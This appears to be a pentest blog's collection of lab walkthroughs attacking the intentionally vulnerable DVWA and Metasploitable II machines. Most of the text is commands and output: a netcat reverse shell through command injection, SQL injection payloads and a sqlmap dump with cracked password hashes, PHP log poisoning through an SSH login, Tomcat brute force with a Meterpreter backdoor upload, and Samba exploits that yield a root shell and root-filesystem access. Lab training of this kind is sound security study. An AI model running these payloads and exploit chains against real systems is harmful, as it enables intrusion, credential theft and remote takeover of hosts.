www-data@metasploitable:/var/www/dvwa/hackable/uploads$ whoami
whoami
www-data
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ 

DVWA: Command Injection

Our goal is to successfully exploit the command injection vulnerability and get local shell access on the remote host.

127.0.0.1;id

As you can see we are able to execute commands on the remote server. Lets next move on to getting a connect back shell using netcat.

nc -e /bin/sh 192.168.56.1 8088

As you can see we got a successful connect back and local system shell on the remote host.

sam@ubuntu:~$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 40718 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/exec$ 

DVWA: SQL Injection (Blind) with sqlmap

We start off by getting the database names hosted on the remote server.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" 
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" 
--dbs
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:21:06] [INFO] the back-end DBMS is MySQL
[09:21:06] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:21:06] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki195

[09:21:06] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:21:06 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$ 

As you can see we have seven databases to choose from, but right now we will focus on the 'dvwa' database for now.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" 
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" 
-D dvwa --tables
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.26#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:23:50 /2020-02-08/

[09:23:50] [INFO] resuming back-end DBMS 'mysql' 
[09:23:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:23:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:23:50] [INFO] fetching tables for database: 'dvwa'
[09:23:50] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:23:50] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:23:50 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$ 

We have two tables in the dvwa database. Lets look at the table 'users'.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" 
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" 
-D dvwa -T users --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.2.26#dev}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:25:03 /2020-02-08/

[09:25:03] [INFO] resuming back-end DBMS 'mysql' 
[09:25:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:25:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:25:04] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:25:04] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+

[09:25:04] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:25:04 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$

Ok, we got back some column names for the users table. lets fetch the user and password and dump the contents of the database.

sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" 
--cookie="security=low; security_level=0; SESScb1b7e2ce310cad2d8cf9c0927abc1d2=MV1sLFVZrY2dZo0xoPjTzVnXEhlkh0ak8SAGpW6FnHc; PHPSESSID=eb817a6889038ed52e8fb18c79dcbfa7" 
-D dvwa -T users -C user,password --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.2.26#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:54 /2020-02-08/

[09:26:54] [INFO] resuming back-end DBMS 'mysql' 
[09:26:54] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8474 FROM (SELECT(SLEEP(5)))aqwP) AND 'wCgT'='wCgT&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x7178716a71,0x70637a4378626f434d4e6478776d70756b43544e5a6862434778454f6e586154626168457a4d6a4e,0x71707a7071),NULL-- -&Submit=Submit
---
[09:26:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[09:26:54] [INFO] fetching entries of column(s) '`user`, password' for table 'users' in database 'dvwa'
[09:26:54] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:26:54] [WARNING] reflective value(s) found and filtering out
[09:26:54] [INFO] retrieved: '1337','8d3533d75ae2c3966d7e0d4fcc69216b'
[09:26:54] [INFO] retrieved: 'admin','5f4dcc3b5aa765d61d8327deb882cf99'
[09:26:55] [INFO] retrieved: 'gordonb','e99a18c428cb38d5f260853678922e03'
[09:26:55] [INFO] retrieved: 'pablo','0d107d09f5bbe40cade3de5c71e9e9b7'
[09:26:55] [INFO] retrieved: 'smithy','5f4dcc3b5aa765d61d8327deb882cf99'
[09:26:55] [INFO] recognized possible password hashes in column 'password'     
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:27:07] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/home/sam/pentest/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:27:17] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:27:22] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:27:22] [INFO] starting 4 processes 
[09:27:26] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:27:27] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[09:27:33] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:27:36] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
Database: dvwa                                                                 
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:27:42] [INFO] table 'dvwa.users' dumped to CSV file '/home/sam/.sqlmap/output/192.168.56.101/dump/dvwa/users.csv'
[09:27:42] [INFO] fetched data logged to text files under '/home/sam/.sqlmap/output/192.168.56.101'

[*] ending @ 09:27:42 /2020-02-08/

sam@ubuntu:~/pentest/sqlmap$ 

As you can see we successfully dumped the user and password column and even cracked the hashes that were stored in the database.

DVWA: SQL Injection

Our goal is to exploit the sql vulnerability and extract user data from the database.

%' or '1'='1

As you can see we got a true condition from our query we injected. Our next task is to see how many columns are in the current table.

%' order by 3 #

There is no column three in this table so lets construct a query using only two columns and lets see if we can find the visible columns to extract data from.

%' union select 1,2#

We see the two columns which we can use to extract data from. Lets first get the version of the mysql server running on the remote host.

%' or 0=0 union select null, version() #

We see the version of the mysql server running at the very bottom of the screen. Lets now go about getting the names of the table in the current database.

%' and 1=0 union select null, table_name from information_schema.tables #

We got the table names and we see the table 'users'. Lets move on to column names from the table users.

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users'#

As you can see what got the column names for the table 'users' lets now extract some data from the database.

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #

We got firstname,lastname,username and password from the database.

DVWA: Local File Inclusion to Shell using auth.log

Our goal is to exploit the local file include vulnerability and gain shell access to the remote machine.

We see that the 'page' parameter is vulnerable to a local file inclusion. Lets try and include /etc/passwd and see if we have any luck.

We first need to poison some log files in order to get remote code execution. For this we will the auth.log file and try and log in to ssh with out php code as our user.

sam@ubuntu:~$ ssh '<?php system($_GET['c']);?>'@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (RSA) to the list of known hosts.
<?php system($_GET[c]);?>@192.168.56.101's password: 
Permission denied, please try again.
<?php system($_GET[c]);?>@192.168.56.101's password: 
Permission denied, please try again.
<?php system($_GET[c]);?>@192.168.56.101's password: 
<?php system($_GET[c]);?>@192.168.56.101: Permission denied (publickey,password).
sam@ubuntu:~$ 

As you can see we tried logging on with the php code as our user. Now what should happen is our php code should be contained in the auth.log file and when we include it from our local file include the php code will be intrepreted and run giving us a command shell to work with.

http://192.168.56.101/dvwa/vulnerabilities/fi/?page=/var/log/auth.log&c=uname%20-a

If we include the page we see the output of the uname command.

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Our next step is to try and get a reverse connect shell on the remote host. For this we will use netcat.

sam@ubuntu:~$ nc -l -v -p 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 35239 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/vulnerabilities/fi$ whoami
whoami
www-data
www-data@metasploitable:/var/www/dvwa/vulnerabilities/fi$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@metasploitable:/var/www/dvwa/vulnerabilities/fi$ 

As you can see we got a reverse connect shell back to us and now have a system prompt we can work from.

Friday, February 7, 2020

Metasploitable II: Tomcat Manager Upload

First we start of with a brute force of some user and pass combinations against the tomcat server.

msf5 > use auxiliary/scanner/http/tomcat_mgr_login
msf5 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                Required  Description
   ----              ---------------                                                                --------  -----------
   BLANK_PASSWORDS   false                                                                          no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                              yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                          no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                          no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                          no        Add all users in the current database to the list
   PASSWORD                                                                                         no        The HTTP password to specify for authentication
   PASS_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             8080                                                                           yes       The target port (TCP)
   SSL               false                                                                          no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                          yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                  yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                              yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                         no        The HTTP username to specify for authentication
   USERPASS_FILE     /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                          no        Try the username as the password for all users
   USER_FILE         /home/sam/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                           yes       Whether to print output for all attempts
   VHOST                                                                                            no        HTTP server virtual host

msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf5 auxiliary(scanner/http/tomcat_mgr_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf5 auxiliary(scanner/http/tomcat_mgr_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:vagrant (Incorrect)
[+] 192.168.56.101:8180 - Login Successful: tomcat:tomcat
[-] 192.168.56.101:8180 - LOGIN FAILED: both:both (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.56.101:8180 - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/tomcat_mgr_login) > 

As you can see we got a Login Successful: tomcat:tomcat for one of the logins to the remote server. Our next step is to upload a backdoor to the server and get shell access.

msf5 > use exploit/multi/http/tomcat_mgr_upload 
msf5 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   no        The password for the specified username
   HttpUsername                   no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT         80               yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword tomcat
HttpPassword => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
HttpUsername => tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8180
RPORT => 8180
msf5 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying V84r2oLgqHQgPw...
[*] Executing V84r2oLgqHQgPw...
[*] Undeploying V84r2oLgqHQgPw ...
[*] Sending stage (53928 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:55925) at 2020-02-07 12:49:35 -0700

meterpreter > shell
Process 1 created.
Channel 1 created.
id  
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat55@metasploitable:/$ pwd
pwd
/
tomcat55@metasploitable:/$ 

As you can see we got shell access now where we can escalate our privileges with some other exploit.

Metasploitable II: Samba Shares

Lets first start off with an nmap scan of the remote host.

root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101

Starting Nmap 7.60 ( https://nmap.org ) at 2020-02-07 12:08 MST
Nmap scan report for 192.168.56.101
Host is up (0.00030s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:AA:7E:5A (Oracle VirtualBox virtual NIC)

Host script results:
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-02-07T14:08:36-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.17 seconds
root@ubuntu:~# 

As you can see we have both ports open and the samba share service running on the remote host. Our next task is to query the samba server and try and mount a share.

sam@ubuntu:~$ smbclient -L //192.168.56.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password: 
Anonymous login successful

 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 tmp             Disk      oh noes!
 opt             Disk      
 IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
 ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

 Server               Comment
 ---------            -------

 Workgroup            Master
 ---------            -------
 WORKGROUP            
sam@ubuntu:~$ 

We see that there are two shares tmp and opt. We cannot access opt as it is password protected but we can mount /tmp with out problem.

sam@ubuntu:~$ smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\sam's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  7 12:03:16 2020
  ..                                 DR        0  Sun May 20 13:36:12 2012
  .ICE-unix                          DH        0  Fri Feb  7 11:56:45 2020
  .X11-unix                          DH        0  Fri Feb  7 11:57:08 2020
  .X0-lock                           HR       11  Fri Feb  7 11:57:08 2020
  4529.jsvc_up                        R        0  Fri Feb  7 11:57:21 2020

  7282168 blocks of size 1024. 5436104 blocks available
smb: \> 

Theres nothing interesting in the tmp folder just some temporary files the operating system has stuck there. lets move on the exploit the remote samba service.

Samba usermap_script

In metasploit it gives us alot of options when attacking the samba share service. One of those modules which we will be using is the usermap_script module. If all goes well we should get back a shell.

msf5 > use exploit/multi/samba/usermap_script 
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP double handler on 192.168.56.1:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo edd61L0j1w8uZUtm;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "edd61L0j1w8uZUtm\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.101:52751) at 2020-02-07 12:01:02 -0700

id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# 

As you can see we got back a root shell with this exploit.

Samba Symlink Traversal

Our next task is to exploit the symlink traversal vulnerabilty. Lets fire up metasploit and give it a go.

msf5 exploit(multi/samba/usermap_script) > use auxiliary/admin/smb/samba_symlink_traversal
msf5 auxiliary(admin/smb/samba_symlink_traversal) > show options

Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT      445              yes       The SMB service port (TCP)
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

msf5 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.56.101
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: SMBSHARE.
msf5 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf5 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.56.101

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.56.101:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.56.101:445 - Now access the following share to browse the root filesystem:
[*] 192.168.56.101:445 -  \\192.168.56.101\tmp\rootfs\

[*] Auxiliary module execution completed
msf5 auxiliary(admin/smb/samba_symlink_traversal) > 

Now we need to load up the /tmp directory on the samba share and see if the folder 'rootfs' is in the folder.

root@ubuntu:~# smbclient //192.168.56.101/tmp
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Feb  7 12:16:32 2020
  ..                                 DR        0  Sun May 20 13:36:12 2012
  .ICE-unix                          DH        0  Fri Feb  7 11:56:45 2020
  .X11-unix                          DH        0  Fri Feb  7 11:57:08 2020
  .X0-lock                           HR       11  Fri Feb  7 11:57:08 2020
  rootfs                             DR        0  Sun May 20 13:36:12 2012
  4529.jsvc_up                        R        0  Fri Feb  7 11:57:21 2020

  7282168 blocks of size 1024. 5436096 blocks available
smb: \> cd rootfs
smb: \rootfs\> ls
  .                                  DR        0  Sun May 20 13:36:12 2012
  ..                                 DR        0  Sun May 20 13:36:12 2012
  initrd                             DR        0  Tue Mar 16 17:57:40 2010
  media                              DR        0  Tue Mar 16 17:55:52 2010
  bin                                DR        0  Sun May 13 22:35:33 2012
  lost+found                         DR        0  Tue Mar 16 17:55:15 2010
  mnt                                DR        0  Wed Apr 28 15:16:56 2010
  sbin                               DR        0  Sun May 13 20:54:53 2012
  initrd.img                          R  7929183  Sun May 13 22:35:56 2012
  home                               DR        0  Fri Apr 16 01:16:02 2010
  lib                                DR        0  Sun May 13 22:35:22 2012
  usr                                DR        0  Tue Apr 27 23:06:37 2010
  proc                               DR        0  Fri Feb  7 11:56:30 2020
  root                               DR        0  Fri Feb  7 11:57:07 2020
  sys                                DR        0  Fri Feb  7 11:56:31 2020
  boot                               DR        0  Sun May 13 22:36:28 2012
  nohup.out                           R     9426  Fri Feb  7 11:57:08 2020
  etc                                DR        0  Fri Feb  7 11:57:02 2020
  dev                                DR        0  Fri Feb  7 11:56:45 2020
  vmlinuz                             R  1987288  Thu Apr 10 11:55:41 2008
  opt                                DR        0  Tue Mar 16 17:57:39 2010
  var                                DR        0  Wed Mar 17 09:08:23 2010
